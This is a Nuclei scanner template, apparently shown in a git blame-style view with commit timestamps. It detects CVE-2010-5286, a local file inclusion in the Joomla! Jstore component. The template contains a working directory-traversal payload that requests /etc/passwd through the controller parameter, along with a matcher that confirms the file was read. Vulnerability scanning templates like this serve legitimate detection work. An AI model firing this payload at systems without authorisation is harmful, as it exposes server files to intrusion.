my-nuclei-templates/CVE-2010-5286.yaml

35 lines
1.1 KiB
YAML
Raw Permalink Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2010-5286
info:
name: Joomla! Component Jstore - 'Controller' Local File Inclusion
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
2021-11-09 22:49:13 +00:00
reference:
- https://www.exploit-db.com/exploits/34837
- https://www.cvedetails.com/cve/CVE-2010-5286
2022-06-18 08:05:25 +00:00
- http://web.archive.org/web/20210123122507/https://www.securityfocus.com/bid/44053/
- http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-5286
2021-11-09 22:49:13 +00:00
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-11-09 22:49:13 +00:00
- type: status
status:
2022-06-18 08:05:25 +00:00
- 200
# Enhanced by mp on 2022/02/18